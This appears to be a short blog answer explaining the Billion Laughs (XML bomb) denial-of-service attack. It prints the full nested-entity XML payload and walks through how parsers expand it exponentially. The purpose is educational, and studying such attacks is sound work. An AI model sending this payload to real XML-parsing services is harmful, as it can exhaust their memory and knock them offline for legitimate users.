How does the billion laughs XML DoS attack work?

The Billion Laughs attack is a denial-of-service attack that targets XML parsers. The Billion Laughs attack is also known as an XML bomb, or more esoterically, the exponential entity expansion attack. A Billion Laughs attack can occur even when using well-formed XML and can also pass XML schema validation.

The vanilla Billion Laughs attack is illustrated in the XML file represented below.

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

In this example, there are 10 different XML entities, lollol9. The first entity, lol is defined to be the string “lol”. However, each of the other entities are defined to be 10 of another entity. The document content section of this XML file contains a reference to only one instance of the entity lol9. However, when this is being parsed by a DOM or SAX parser, when lol9 is encountered, it is expanded into 10 lol8s, each of which is expanded into 10 lol7s, and so on and so forth. By the time everything is expanded to the text lol, there are 100,000,000 instances of the string "lol". If there was one more entity, or lol was defined as 10 strings of “lol”, there would be a Billion “lol”s, hence the name of the attack. Needless to say, this many expansions consumes an exponential amount of resources and time, causing the DOS.

A more extensive explanation exists on my blog.

Leave a Comment